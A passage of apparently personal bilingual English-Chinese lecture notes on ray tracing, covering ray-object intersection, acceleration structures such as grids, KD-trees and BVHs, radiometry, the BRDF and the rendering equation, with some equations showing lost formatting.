    ​射线投射

    png

    1. Generate an image by casting one ray per pixel

      通过为每个像素投射一条光线生成图像

    2. Check for shadows by sending a ray to the light

      通过向光源发送光线检查阴影


    Ray Casting - Generating Eye Rays

    ​从眼睛处发出射线

    Pinhole Camera Model

    ​针孔摄像机模型

    png

    ​从眼睛处发射射线,射线第一个打到的物体即为观察到的物体。


    Ray Casting - Shading Pixels (Local Only)

    ​给像素着色

    png

    ​所看到的点与光照方向,物体法线,材质等参数,就可以计算出观察到的像素的颜色。


    Recursive (Whitted-Style) Ray Tracing

    ​递归(怀特式)光线追踪。比之前的光线追踪算法还要高级一点。

    png

    “An improved Illumination model for shaded display” T. Whitted, CACM 1980

    Time:

    • VAX 11/780 (1979) 74m

      当时渲染了 74 分钟。

    • PC (2006) 6s

    • GPU (2012) 1/30s


    png

    ​眼睛发出的射线还会再反射到其他面上。


    png

    ​还有可能产生折射。


    png

    ​这些打到物体上的点再计算光照,如果中间有阻挡,则视为阴影部分。

    Ray-Surface Intersection

    ​射线-表面交点。现在该研究射线在表面上的交点是如何计算的。

    png

    Ray is defined by its origin and a direction vector

    ​射线由其原点 $\mathbf{o}$ 和方向矢量 $\mathbf d$ 定义

    Ray equation:

    png

    ​用射线发出的时间 $t$ 来定义这个射线:

    $$\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},\quad0\leq t<\infty $$


    Ray Intersection With Sphere

    ​射线与球面的交点

    Ray: $\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},\mathrm{}0\leq t<\infty $

    Sphere: $\mathbf p:(\mathbf p-\mathbf c)2-R2=0$

    What is an intersection?

    ​什么是交点?

    The intersection $\mathbf p$ must satisfy bothray equation and sphere equation

    ​交点 $\mathbf p$ 必须同时满足射线方程和球面方程,联立两个方程即可。

    png

    Solve for intersection:

    $$(\mathbf{o}+t\mathbf{~d}-\mathbf{c})2-R2=0$$

    png

    $\begin{aligned}
    &at^2+bt+c=0,\text{ where} \
    &a=\mathbf{d}\cdot\mathbf{d} \
    &b=2(\mathbf{o}-\mathbf{c})\cdot\mathbf{d} \
    &\begin{aligned}c=(\mathbf{o}-\mathbf{c})\cdot(\mathbf{o}-\mathbf{c})-R^2\end{aligned} \
    &\begin{aligned}t=\frac{-b\pm\sqrt{b^2-4ac}}{2a}\end{aligned}
    \end{aligned}$

    ​就是一元二次方程求解了。


    Ray Intersection With Implicit Surface

    Ray 射线方程: $\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},\mathrm{}0\leq t<\infty$

    General implicit surface 一般隐式曲面: $\mathbf{p}:f(\mathbf{p})=0$

    Substitute ray equation 将射线方程代入: $f(\mathbf{o}+t\mathbf{d})=0$

    Solve for real, positive roots 求解实数正根:

    png

    ​对于这样的参数方程,对于计算机来说求解很容易!


    Ray Intersection With Triangle Mesh

    ​但是一般都用多边形面来表示一个几何,如何计算?

    png

    Why?

    • Rendering: visibility, shadows, lighting…

      渲染:可见度、阴影、 光照…

    • Geometry: inside/outside test

      几何:内部/外部测试

    How to compute?

    ​如何计算?

    Let’ s break this down:

    ​让我们来分析一下:

    • Simple idea: just intersect ray with each triangle

      简单的想法:只需将射线与每个三角形相交即可

    • Simple, but slow (acceleration?)

      简单,但速度慢(加速?)

    • Note: can have 0, 1 intersections (ignoring multiple intersections)

      注意:可以有 0 个、1 个交点 (忽略多个交点)


    Ray Intersection With Triangle

    png

    Triangle is in a plane

    ​三角形位于平面内

    • Ray-plane intersection

      射线与平面相交

    • Test if hit point is inside triangle

      测试命中点是否位于三角形内

    Many ways to optimize…

    ​优化方法有很多…


    Plane Equation

    ​平面方程

    Plane is defined by normal vector and a point on plane

    ​平面由法向量和平面上的一个点定义

    Example:

    png

    Plane Equation (if $p$ satisfies it, then $p$ is on the plane):

    ​平面方程(若 $p$ 满足该方程,则 $p$ 在平面上):

    png


    Ray Intersection With Plane

    Ray equation: $\mathbf{r}(t)=\mathbf{o}+t\mathbf{d},0\leq t<\infty $

    Plane equation: $\mathbf{p}:(\mathbf{p}-\mathbf{p}^{\prime})\cdot\mathbf{N}=0$

    Solve for intersection: 将两个方程联立,求解

    $\text{Set }\mathbf{p}=\mathbf{r}(t)\text{ and solve for }t$

    $\mathbf{(p-p^{\prime})\cdot N=(o+td-p^{\prime})\cdot N=0}$

    $\begin{aligned}t&=\frac{(\mathbf{p’-o})\cdot\mathbf{N}}{\mathbf{d}\cdot\mathbf{N}}&\textsf{Check: }0\leq t<\infty\end{aligned}$


    Möller Trumbore Algorithm

    A faster approach, giving barycentric coordinate directly

    ​一种更快的方法(判断射线是否经过三角形面),直接给出重心坐标

    Recall: How to determine if the “intersection” is inside the triangle?

    ​回想一下:如何确定“交点”是否在三角形内部?

    $$\vec{\mathbf{O}}+t\vec{\mathbf{D}}=(1-b_1-b_2)\vec{\mathbf{P}}_0+b_1\vec{\mathbf{P}}_1+b_2\vec{\mathbf{P}}_2$$

    ​将射线打到平面上的点用三角形的重心坐标来表示。

    Hint: $(1-b_1-b_2), b_1, b_2$ are barycentric coordinates!

    ​提示:$(1-b_1-b_2),b_1,b_2$ 是重心坐标!

    $$\begin{bmatrix}t\b_1\b_2\end{bmatrix}=\frac1{\vec{\mathbf{S}}_1\bullet\vec{\mathbf{E}}_1}\begin{bmatrix}\vec{\mathbf{S}}_2\bullet\vec{\mathbf{E}}_2\\vec{\mathbf{S}}_1\bullet\vec{\mathbf{S}}\\vec{\mathbf{S}}_2\bullet\vec{\mathbf{D}}\end{bmatrix}$$

    $\text{Cost}=(1 \text{div}, 27 \text{mul} ,17 \text{add})$

    ​需要 1 次除,27 次乘,17 次加。

    Accelerating Ray-Surface Intersection

    ​加速计算射线-表面交点的方法

    Ray Tracing – Performance Challenges

    Simple ray-scene intersection

    ​简单的光线场景交点

    • Exhaustively test ray-intersection with every triangle

      详尽地测试每个三角形的光线交点

    • Find the closest hit (i.e. minimum $t$)

      找到最接近的命中点(即最小 $t$)

    Problem:

    ​问题:

    • Naive algorithm = #pixels ⨉ # traingles (⨉ #bounces)

      简单算法 = #像素 ⨉ #三角形(⨉ #反射)

    • Very slow!

      非常慢!

    For generality, we use the term objects instead of triangles later (but doesn’ t necessarily mean entire objects)

    ​非常慢!为了通用,我们稍后使用术语对象而不是三角形(但并不一定意味着整个对象)

    png

    png

    ​像这几个超过一千多个面了,要是这么渲染的话性能太差了。

    Bounding Volumes

    png

    Quick way to avoid intersections: bound complex object with a simple volume

    ​避免上面计算相交的快速方法:用简单体积绑定复杂物体

    • Object is fully contained in the volume

      物体完全包含在包围盒中

    • If it doesn’ t hit the volume, it doesn’ t hit the object

      如果射线没有击中包围盒,它就不会击中物体,就不用后续计算。优化性能

      如果击中了,再老老实实计算吧。

    • So test BVol first, then test object if it hit

      因此,首先测试 BVol,然后测试物体是否击中


    Ray-Intersection With Box

    ​射线与盒子的相交

    Understanding: box is the intersection of 3 pairs of slabs

    ​理解:包围盒是三个平面的相交部分。

    png

    Specifically:

    ​具体来说:

    We often use an Axis-Aligned Bounding Box (AABB)

    ​我们经常使用轴对齐包围盒 (AABB)

    i.e. any side of the BB is along either $x$, $y$, or $z$ axis

    ​即 BB 的任何一侧都沿着 $x$、$y$ 或 $z$ 轴


    Ray Intersection with Axis-Aligned Box

    png

    ​2D 空间中,计算射线在 $\mathrm x_0$ 和 $\mathrm x_1$ 的交点,得到一段线段。再$\mathrm y_0$ 和 $\mathrm y_1$ 的交点,得到另一段线段。两条线段取交集即为射线在包围盒中的范围。

    2D example; 3D is the same! Compute intersections with slabs and take intersection of $t_{min}/t_{max}$ intervals.

    ​2D 示例;3D 也一样!计算与板块的交点并取 $t_{min}/t_{max}$ 间隔的交点

    How do we know when the ray intersects the box?

    ​我们如何知道射线何时与盒子相交?


    • Recall: a box (3D) = three pairs of infinitely large slabs

      回想一下:一个盒子(3D)= 三对无限大的平板

    • Key ideas

      关键思想

      • The ray enters the box only when it enters all pairs of slabs

        只有当射线进入所有平板对时,它才会进入盒子

      • The ray exits the box as long as it exits any pair of slabs

        只要射线离开任何一对平板,它就会离开盒子

    • For each pair, calculate the $t_{\text{min}}$ and $t_\text{max}$ (negative is fine)

      对于每一对,计算 $t_{\text{min}}$ 和 $t_\text{max}$(负数也可以)

    • For the 3D box, $t_{\text{enter}} = \max{t_{\text{min}}}, t_{\text{exit}} = \min{t_{\text{max}}}$

      对于 3D 盒子,$t_{\text{enter}} = \max{t_{\text{min}}},t_{\text{exit}} = \min{t_{\text{max}}}$

    • If $t_{\text{enter}} < t_{\text{exit}}$, we know the ray stays a while in the box
      (so they must intersect!)

      如果 $t_{\text{enter}} < t_{\text{exit}}$,我们知道射线会在盒子中停留一段时间(所以它们一定相交!)


    • However, ray is not a line

      但是,射线不是直线

      • Should check whether $t$ is negative for physical correctness!
      • 应检查 $t$ 是否为负数以确保物理正确性!
    • What if $t_\text{exit} < 0$?

      • The box is “behind” the ray — no intersection!

        盒子在射线“后面” ——没有相交!

    • What if $t_{\text{exit}} \ge 0$ and $t_{text{enter}} < 0$?

      • The ray’ s origin is inside the box — have intersection!

        线的原点在盒子内部 — 有相交!

    • In summary, ray and AABB intersect iff

      综上所述,射线与 AABB 相交,当且仅当

      • $t_{\text{enter}} < t_{\text{exit}}\ &&\ t_{\text{exit}} \ge 0$

    Why Axis-Aligned?

    General

    png

    $$t=\frac{(\mathbf{p}^{\prime}-\mathbf{o})\cdot\mathbf{N}}{\mathbf{d}\cdot\mathbf{N}}$$

    3subtractions, 6multiplies, 1 division

    ​3 次加法,6 次乘法,1 次除法

    Slabs perpendicular to x-axis

    png

    $$t=\frac{\mathbf{p}^{\prime}_x-\mathbf{o}_x}{\mathbf{d}_x}$$

    1subtraction, 1 division

    ​只需要一次加法,一次除法

    Lecture 14: Ray Tracing 2 (Acceleration & Radiometry)

    Announcements

    ​公告

    • GTC news: DLSS 2.0

      图形学前沿

    • GTC news: RTXGI

    • Personal feeling

      个人感受

      • Offline rendering techniques will soon become real-time

        离线渲染技术将很快成为实时技术

      • Current real-time rendering techniques will still be useful

        当前的实时渲染技术仍然有用(光栅化还没有那么快被淘汰)

    Using AABBs to accelerate ray tracing

    Uniform Spatial Partitions (Grids)

    ​统一空间分割(网格)

    Preprocess – Build Acceleration Grid

    ​预处理 - 构建加速网格

    png

    1. Find bounding box

      给所有物体打一个包围盒

    png

    1. Create grid

      给这个包围盒用网格划分成多个小包围盒

    png

    1. Store each object in overlapping cells

      将每个对象存储在重叠的单元格中


    png

    Ray-Scene Intersection

    Step through grid in ray traversal order

    ​按射线遍历顺序逐步穿过网格

    For each grid cell

    ​对于每个网格单元

    ​Test intersection with all objects stored at that cell

    ​测试与存储在该单元格中的所有对象的交集。如果有交集,则检测到物体,再后续计算


    Grid Resolution?

    png

    One cell

    • No speedup

      网格大小的设定是个问题,如果网格太大,相当于没有加速

    png

    Too many cells

    • Inefficiency due to extraneous grid traversal

      无关的网格遍历导致效率低下

    png

    Heuristic:

    启发式:

    • #cells = C * #objs
    • C ≈ 27 in 3D

    网格个数大概为物体的个数的 27 倍比较合适!


    Uniform Grids – When They Work Well

    png

    Grids work well on large collections of objects that are distributed evenly in size and space

    ​网格适用于大小和空间分布均匀的大型对象集合


    Uniform Grids – When They Fail

    ​统一网格–当它们失效时

    png

    “Teapot in a stadium” problem

    ​当各个对象的大小分布和空间分布不均匀时,寄!”体育馆里的茶壶“的问题。

    Spatial Partitions

    Spatial Partitioning Examples

    ​空间划分实例

    png

    Note: you could have these in both 2D and 3D. In lecture we will illustrate principles in 2D.

    ​注意:您可以在二维和三维中使用这些内容。在课程中,我们将说明 2D 的原理。

    ​在计算机图形学中,空间划分是一种常用的技术,用于加速对空间中对象的搜索和查询。它通过将空间划分为更小的区域或单元来减少搜索的复杂度。以下是一些空间划分的示例:

    1. 网格 (Grid):网格将空间划分为规则的网格单元,每个单元可以包含一个或多个对象。这种方法适用于静态场景,可以通过网格索引快速定位对象。
    2. 八叉树 (Oct-Tree):八叉树是三维空间的类似于四叉树的划分方法。它将空间递归地分成八个立方体,每个立方体可以继续分为八个子立方体,以此类推。八叉树通常用于三维图形渲染、体素化等方面。
    3. kd-树 (kd-tree):kd-树是一种多维空间划分方法,它根据数据点在各维度上的分布,递归地将空间划分为轴对齐的超矩形区域。kd-树常用于最近邻搜索等问题。(与八叉树相比,八叉树是一次 $x,y,z$ 轴地划分,kd-树 每次只往一个方向划分,划分次数与维度无关)
    4. 二叉空间分区 (BSP-Tree):与 kd-树相比,它斜着切。(其实没有对齐的好计算)

    KD-Tree Pre-Processing

    png

    ​先给空间 $A$ 竖的来一刀。得到蓝绿两个区域(叶子节点)。

    png

    ​将绿色区域作为 $B$,横的来一刀。得到新的绿和黄色两个叶子节点。

    png

    ​以此类推,一阵乱切。

    Note: also subdivide nodes 1 and 2, etc.

    ​注:还可细分节点 1 和 2 等。只是示意图是这么切的而已。


    Data Structure for KD-Trees

    ​KD 树的数据结构

    Internal nodes store

    内部节点存储

    • split axis: x-, y-, or z-axis

      分割轴:X 轴、Y 轴或 Z 轴

    • split position: coordinate of split plane along axis

      分割位置:分割平面沿轴的坐标

    • children: pointers to child nodes

      子节点:指向子节点的指针

    • No objects are stored in internal nodes

      内部节点中不存储任何对象

    Leaf nodes store

    ​叶节点存储

    • list of objects

      对象列表


    Traversing a KD-Tree

    ​遍历 KD 树

    png

    ​射线穿过 $A$ 时,只需判断射线与各个叶子节点 $1,2,3,4,5$ 的相交关系即可。

    png

    Internal node: split

    ​内部节点:分割

    png

    Assume it’ s leaf node: intersect all objects

    ​假设它是叶节点:与所有叶节点里的所有对象判断相交

    png

    Internal node: split

    ​内部节点:分割

    png

    Leaf node: intersect all objects

    ​遇到相交的叶节点,与所有叶节点里的所有对象判断相交

    png

    Intersection found

    ​找到相交的对象

    ​在计算机图形学领域,Object Partitions 和 Bounding Volume Hierarchy (BVH) 是两种常用的空间分割和组织技术,用于加速场景中对象的渲染和碰撞检测等操作。

    1. Object Partitions: Object Partitions 是一种将场景中的对象按照位置或其他属性进行划分的技术。通常情况下,这种划分是基于空间的,将场景划分为多个区域或单元,每个单元包含一组对象。Object Partitions 技术的目的是通过合理的空间划分,减少需要处理的对象数量,从而提高渲染和碰撞检测等操作的效率。常见的 Object Partitions 技术包括 kd-树、Octree 等。
    2. Bounding Volume Hierarchy (BVH): Bounding volume hierarchy (BVH) 即层次包围体,在 BVH 中,所有的几何物体都会被包在 bounding volume 的叶子节点里面,bounding volume 外面继续包着一个更大的 bounding volume,递归地包裹下去,最终形成的根节点会包裹着整个场景。

    KD-树目前用的比较少,主要是不好划分,而且一个对象有可能被放置在多个叶子节点里,导致重复计算。

    Object Partitions & Bounding Volume Hierarchy (BVH)

    Bounding Volume Hierarchy (BVH)

    png

    ​根节点包含整个场景。

    png

    ​在根节点里套包围盒。

    png

    ​我再套。

    png

    ​我还套!

    png


    Summary: Building BVHs

    • Find bounding box

      查找边界框

    • Recursively split set of objects in two subsets

      递归地将对象集合分成两个子集

    • Recompute the bounding box of the subsets

      重新计算子集的边界框

    • Stop when necessary

      必要时停止

    • Store objects in each leaf node

      在每个叶节点中存储对象


    Building BVHs

    How to subdivide a node?

    ​如何细分节点?

    • Choose a dimension to split

      选择要分割的维度

    • Heuristic #1: Always choose the longest axis in node

      启发式 1: 始终选择节点中最长的轴线

    • Heuristic #2: Split node at location of median object

      启发式 2: 在中位对象的位置分割节点

    Termination criteria?

    ​终止标准?

    • Heuristic: stop when node contains few elements (e.g. 5)

      启发式:当节点包含较少元素(如 5 个)时停止


    Data Structure for BVHs

    Internal nodes store

    ​内部节点存储

    • Bounding box

      边界框

    • Children: pointers to child nodes

      子节点:指向子节点的指针

    Leaf nodes store

    ​叶节点存储

    • Bounding box

      边界框

    • List of objects

      对象列表

    Nodes represent subset of primitives in scene

    ​节点代表场景中基元的子集

    • All objects in subtree

      子树上的所有对象


    BVH Traversal

    png

    Intersect(Ray ray, BVH node) {
    if (ray misses node.bbox) return;
    if (node is a leaf node)
    test intersection with all objs;
    return closest intersection;
    hit1 = Intersect(ray, node.child1);
    hit2 = Intersect(ray, node.child2);
    return the closer of hit1, hit2;
    }

    ​递归地检测是否相交。


    Spatial vs Object Partitions

    png

    Spatial partition (e.g.KD-tree)

    ​空间分区(如 KD 树)

    • Partition space into non-overlapping regions

      将空间划分为不重叠的区域

    • An object can be contained in multiple regions

      一个对象可包含在多个区域中

    png

    Object partition (e.g. BVH)

    ​对象分区(如 BVH)

    • Partition set of objects into disjoint subsets

      将对象集合划分为互不相交的子集

    • Bounding boxes for each set may overlap in space

      每个子集的边界框可能在空间上重叠

    Basic radiometry (辐射度量学)

    Advertisement: new topics from now on, scarcely covered in other graphics courses

    ​广告:从现在开始,其他图形课程很少涉及的新主题


    Radiometry — Motivation

    png

    Observation

    • In assignment 3, we implement the Blinn-Phong model

      在作业 3 中,我们执行 Blinn-Phong 模型

    • Light intensity $I$ is 10, for example

      例如,光强 $I$ 为 10

    • But 10 what?

      但 10 是什么?连单位都没有

    Do you think Whitted style ray tracing gives you CORRECT results?

    ​你认为怀特风格的光线追踪能得出正确的结果吗?

    All the answers can be found in radiometry

    ​所有答案都可以在辐射测量中找到

    • Also the basics of “Path Tracing”

      还有”路径跟踪“的基础知识


    Radiometry

    ​辐射测量

    Measurement system and units for illumination

    ​照明测量系统和单位

    Accurately measure the spatial properties of light

    ​精确测量光的空间特性

    • New terms: Radiant flux, intensity, irradiance, radiance

      新术语:辐射通量、强度、辐照度、辐射度

    Perform lighting calculations in a physically correct manner

    ​以物理上正确的方式进行照明计算


    My personal way of learning things:

    ​我个人的学习方法:

    • WHY, WHAT, then HOW

      为什么、是什么,然后是怎么做

    Radiant Energy and Flux (Power)

    ​辐射能量和通量(功率)

    Definition: Radiant energy is the energy of electromagnetic radiation. It is measured in units of joules, and denoted by the symbol:

    ​定义:辐射能是电磁辐射的能量。它以焦耳为单位,用符号表示:

    $$Q\mathrm{[J=Joule]}$$

    Definition: Radiant flux (power) is the energy emitted, reflected, transmitted or received, per unit time

    ​定义:辐射通量(功率)是单位时间内发射、反射、传输或接收的能量

    $$\Phi\equiv\frac{\mathrm{d}Q}{\mathrm{d}t}\text{ [W = Watt] [lm = lumen]}^\star $$


    Flux – #photons flowing through a sensor in unit time

    ​光通量–单位时间内流经传感器的光子数量

    png


    Important Light Measurements of Interest

    ​重要的相关光测量值

    png

    Light Emitted From A Source
    光源发出的光
    “Radiant Intensity”
    辐射强度

    png

    Light Falling On A Surface
    光落在物体表面
    “Irradiance”
    "辐照度"

    png

    Light Traveling Along A Ray
    光沿着光线行进
    "Radiance"
    “光芒”

    Radiant Intensity

    ​辐射强度

    Definition: The radiant (luminous) intensity is the power per unit solid angle (?) emitted by a point light source.

    ​定义: 辐射(发光)强度是点光源每单位立体角(?)这是个什么玩意

    png

    $I(\omega)\equiv\frac{\mathrm{d}\Phi}{\mathrm{d}\omega}$

    $\left[\frac{\mathrm{W}}{\mathrm{sr}}\right]\left[\frac{\mathrm{lm}}{\mathrm{sr}}=\mathrm{cd}=\mathrm{candela}\right]$

    The candela is one of the seven SI base units.

    ​坎德拉是国际单位制七个基本单位之一。


    Angles and Solid Angles

    png

    Angle: ratio of subtended arc length on circle to radius

    ​平面角:圆上被摄弧长与半径之比

    • $\theta=\frac{l}{r}$

    • Circle has $2\pi$ radians

      圆的弧度为 $2\pi$

    png

    Solid angle: ratio of subtended area on sphere to radius squared

    ​实心角:球面上的入射面积与半径平方的比值

    • $\Omega=\frac{A}{r^2}$

    • Sphere has $4\pi$ steradians


    Differential Solid Angles

    png

    ​这个实体角的求解公式:

    $\begin{aligned}\mathrm{d}A=&(r\mathrm{d}\theta)(r\sin\theta\mathrm{d}\phi)\=&r^2\sin\theta\mathrm{d}\theta\mathrm{d}\phi\end{aligned}$

    $$\mathrm{d}\omega=\frac{\mathrm{d}A}{r^2}=\sin\theta\mathrm{d}\theta\mathrm{d}\phi $$

    **Sphere: **$S^2$

    $\begin{aligned}\Omega&=\int_{S2}\mathrm{d}\omega\&=\int_0{2\pi}\int_0^\pi\sin\theta\mathrm{d}\theta\mathrm{d}\phi\&=4\pi\end{aligned}$


    $\omega$ as a direction vector

    ​将 $\omega$ 作为方向向量

    png

    Will use $\omega$ to denote a direction vector (unit length)

    ​用 $\omega$ 表示方向向量(单位长度)


    Isotropic Point Source

    ​各向同性点源

    png

    $$\begin{aligned}\Phi&=\int_{S^2}I\mathrm{~d}\omega\&=4\pi I\end{aligned}$$

    $$I=\frac\Phi{4\pi}$$


    Modern LED Light

    png

    Output: 815 lumens

    ​输出:815 流明

    (11W LED replacement for 60W incandescent)

    ​(11 瓦 LED 可替代 60 瓦白炽灯)

    Radiant intensity?

    ​辐射强度?

    Assume isotropic:

    ​Intensity = 815 lumens / 4pi sr = 65 candelas

    Lecture 15 Ray Tracing 3 (Light Transport & Global Illumination)

    Reviewing Concepts

    png

    名称公式解释
    Radiant energy 辐射能
    (在 CG 中很少使用)
    $Q[\mathrm{J}=\text {Joule}]$the energy of electromagnetic radiation
    电磁辐射的能量
    Radiant flux (power) 辐射通量(功率)$\Phi\equiv\frac{\mathrm{d}Q}{\mathrm{d}t}[\mathrm{W}=\text{Watt}][\mathrm{lm}=\text{lumen}]$Energy per unit time
    单位时间能量
    Radiant intensity 辐射强度$I(\omega)\equiv\frac{\text d\Phi}{\text d\omega}$power per unit solid angle
    单位立体角功率
    Solid Angle 实体角$\Omega=\frac{A}{r^2}$ratio of subtended area on sphere to radius squared
    球面所占面积与半径平方之比

    Irradiance

    辐照度

    Definition: The irradiance is the power per unit area incident on a surface point.

    ​定义:辐照度是照射在表面某一点的每单位面积的功率。

    png

    $$E(\mathrm x)\equiv\frac{\text d\Phi(\mathrm x)}{\mathrm d A}$$

    $$\left[\frac{W}{m2}\right]\left[\frac{\text{lm}}{m2}=\text{lux}\right]$$


    Lambert’ s Cosine Law

    ​兰伯特余弦定理

    Irradiance at surface is proportional to cosine of angle between light direction and surface normal.

    ​表面辐照度与光线方向和表面法线之间的角度的余弦成正比。

    (Note: always use a unit area, the cosine applies on $\Phi$)

    ​(注意:始终使用单位面积,余弦适用于 $\Phi$)

    png

    Top face of cube receives a certain amount of power
    立方体顶面接收一定量的能量
    $E=\frac{\Phi}{A}$

    png

    Top face of 60º rotated cube receives half power
    60º 旋转立方体的顶面接收一半功率
    $E=\frac{1}{2}\frac{\Phi}{A}$

    png

    In general, power per unit area is proportional to $\cos\theta=l\cdot n$
    一般而言,单位面积功率与 $\cos\theta=l\cdot n$ 相关
    $E=\frac{\Phi}{A}\cos\theta$

    Why Do We Have Seasons?

    png

    ​为什么我们会有季节?因为太阳光到地球各个地方的夹角不同。

    Earth’ s axis of rotation: ~23.5° off axis


    Correction: Irradiance Falloff

    ​校正:辐照度衰减

    png

    Assume light is emitting power in a uniform angular distribution

    ​假设光以均匀的角度分布发射功率

    Compare irradiance at surface of two spheres:

    ​比较两个球体表面的辐照度:

    Radiance

    ​辐射

    png

    Radiance is the fundamental field quantity that describes the distribution of light in an environment

    ​辐射度是描述环境中光分布的基本场量

    • Radiance is the quantity associated with a ray

      辐射度是与射线相关的量

    • Rendering is all about computing radiance

      渲染就是计算辐射度

    Definition: The radiance (luminance) is the power emitted, reflected, transmitted or received by a surface, per unit solid angle, per projected unit area.

    ​定义:辐射度(亮度)是表面在单位立体角单位投影面积上发射、反射、透射或接收的功率。

    png

    $$L(\mathrm{p},\omega)\equiv\frac{\mathrm{d}^2\Phi(\mathrm{p},\omega)}{\mathrm{d}\omega\mathrm{d}A\cos\theta}$$

    $\cos\theta$ accounts for projected surface area

    ​$\cos\theta$ 表示投影表面积

    $$\left[\frac{\mathrm{W}}{\mathrm{sr}\mathrm{m}{2}}\right]\left[\frac{\mathrm{cd}}{\mathrm{m}{2}}=\frac{\mathrm{lm}}{\mathrm{sr}\mathrm{m}^{2}}=\mathrm{nit}\right]$$

    Definition: power per unit solid angle per projected unit area.

    ​定义:单位投影面积单位立体角的功率。

    $$L(\mathrm{p},\omega)\equiv\frac{\mathrm{d}^2\Phi(\mathrm{p},\omega)}{\mathrm{d}\omega\mathrm{d}A\cos\theta}$$

    Recall

    • Irradiance: power per projected unit area

      辐照度:单位投影面积的功率

    • Intensity: power per solid angle

      强度:单位立体角的功率

    So

    • Radiance: Irradiance per solid angle

      辐射度:单位立体角的辐照度

    • Radiance: Intensity per projected unit area

      辐射度:单位投影面积的强度


    Incident Radiance

    ​入射辐射

    Incident radiance is the irradiance per unit solid angle arriving at the surface.

    ​入射辐射度是到达表面的每单位立体角的辐射度。

    png

    $$L(\mathrm{p},\omega)=\frac{\mathrm{d}E(\mathrm{p})}{\mathrm{d}\omega\cos\theta}$$

    i.e. it is the light arriving at the surface along a given ray (point on surface and incident direction).

    ​即,它是沿给定射线(表面上的点和入射方向)到达表面的光。


    Exiting Radiance

    png

    Exiting surface radiance is the intensity per unit projected
    area leaving the surface.

    ​出射表面辐射度是离开表面的每单位投影面积的强度。

    $$L(\mathrm{p},\omega)=\frac{\mathrm{d}I(\mathrm{p},\omega)}{\mathrm{d}A\cos\theta}$$

    e.g. for an area light it is the light emitted along a given ray
    (point on surface and exit direction).

    ​例如,对于区域光来说,它是沿给定射线(表面上的点和出射方向)发射的光。


    Irradiance vs. Radiance

    ​辐照度与辐射度

    Irradiance: total power received by area $\text dA$

    ​辐照度:区域 $\text dA$ 接收的总功率

    Radiance: power received by area $\text dA$ from “direction” $\text d\omega$

    ​辐射度:区域 $\text dA$ 从“方向” $\text d\omega$ 接收的功率

    $$\begin{aligned}dE(\mathrm{p},\omega)&=L_i(\mathrm{p},\omega)\cos\theta\mathrm{d}\omega\E(\mathrm{p})&=\int_{H^2}L_i(\mathrm{p},\omega)\cos\theta\mathrm{d}\omega\end{aligned}$$

    png

    Unit Hemisphere 单位半球: $H^2$

    Bidirectional Reflectance Distribution Function (BRDF)

    ​双向反射分布函数 (BRDF)


    Reflection at a Point

    ​点的反射

    Radiance from direction $\omega_i$ turns into the power $E$ that $\text dA$ receives
    Then power $E$ will become the radiance to any other direction $\omega_o$

    ​来自方向 $\omega_i$ 的辐射度变为 $\text dA$ 接收的功率 $E$ 然后功率 $E$ 将成为到任何其他方向 $\omega_o$ 的辐射度

    png

    Differential irradiance incoming 入射光的差异辐照度: $\text dE(\omega_i)=L(\omega_i)cos\theta_i\text d\omega_i$

    Differential radiance exiting (due to $\text d E(\omega_1)$ )差分辐射退出(由于 $\text d E(\omega_1)$ ):$\text d L_r(\omega_r)$


    BRDF

    The Bidirectional Reflectance Distribution Function (BRDF) represents how much light is reflected into each outgoing direction $\omega_r$ from each incoming direction

    ​双向反射分布函数 (BRDF) 表示从每个入射方向反射到每个出射方向 $\omega_r$ 的光量

    png

    $$f_r(\omega_i\to\omega_r)=\frac{\mathrm{d}L_r(\omega_r)}{\mathrm{d}E_i(\omega_i)}=\frac{\mathrm{d}L_r(\omega_r)}{L_i(\omega_i)\cos\theta_i\mathrm{d}\omega_i}\left[\frac{1}{\mathrm{sr}}\right]$$


    The Reflection Equation

    ​反射方程

    png

    $$L_r(\mathrm{p},\omega_r)=\int_{H^2}f_r(\mathrm{p},\omega_i\to\omega_r)L_i(\mathrm{p},\omega_i)\cos\theta_i\mathrm{d}\omega_i$$


    Challenge: Recursive Equation

    ​挑战:递归方程

    Reflected radiance depends on incoming radiance

    ​反射辐射取决于入射辐射

    $$L_r(\mathrm{p},\omega_r)=\int_{H^2}f_r(\mathrm{p},\omega_i\to\omega_r)L_i(\mathrm{p},\omega_i)\cos\theta_i\mathrm{d}\omega_i$$

    • $L_r(\mathrm{p},\omega_r)$ reflected radiance 反射辐射
    • $L_{i}(\mathrm{p},\omega_{i})$ incoming radiance 入射辐射

    But incoming radiance depends on reflected radiance (at
    another point in the scene)

    ​但入射辐射取决于反射辐射(在场景中的另一点)


    The Rendering Equation

    ​渲染方程

    Re-write the reflection equation 重写反射方程:

    $$\begin{aligned}L_r(\text{p},\omega_r)=\int_{H^2}f_r(\text{p},\omega_i\to\omega_r)L_i(\text{p},\omega_i)\cos\theta_i\text{d}\omega_i\end{aligned}$$

    by adding an Emission term to make it general!

    ​通过添加发射项使其变得通用!

    The Rendering Equation

    $$\begin{aligned}L_o(p,\omega_o)=L_e(p,\omega_o)+\int_{\Omega^+}L_i(p,\omega_i)f_r(p,\omega_i,\omega_o)(n\cdot\omega_i)\mathrm{d}\omega_i\end{aligned}$$

    How to solve? Next lecture!

    Note: now, we assume that all directions are pointing outwards!

    注意:现在,我们假设所有方向都指向外面($\Omega^+$)!

    Understanding the rendering equation

    ​理解渲染方程

    png

    ​对于单个点光源:

    $L_r(x,\omega_r)=L_e(x,\omega_r)+L_i(x,\omega_i)f(x,\omega_i,\omega_r)(\omega_i,n)$

    • $L_r(x,\omega_r)$

      Reflected Light (Output Image) 反射光(输出图像)

    • $L_e(x,\omega_r)$

      Emission

      自发光

    • $L_i(x,\omega_i)$

      Incident Light (from light source)

      入射光(来自光源)

    • $f(x,\omega_i,\omega_r)$

      BRDF

    • $(\omega_i,n)$

      Cosine of Incident angle

      入射角余弦

    png

    ​多个点光源,求和。Sum over all light sources.

    $$L_r(x,\omega_r)=L_e(x,\omega_r)+\sum L_i(x,\omega_i)\left.f(x,\omega_i,\omega_r)\right.(\omega_i,n)$$

    png

    ​平面光源,使用积分。Replace sum with integral.

    $$L_r(x,\omega_r)=L_e(x,\omega_r)+\int_\Omega L_i(x,\omega_i)f(x,\omega_i,\omega_r)\cos\theta_i\mathrm{d}\omega_i$$

    png

    Surfaces (interreflection)

    ​表面(相互反射)

    png

    png

    ​这是当年那个论文渲染出来的结果。


    Rendering Equation as Integral Equation

    ​将方程渲染为积分方程

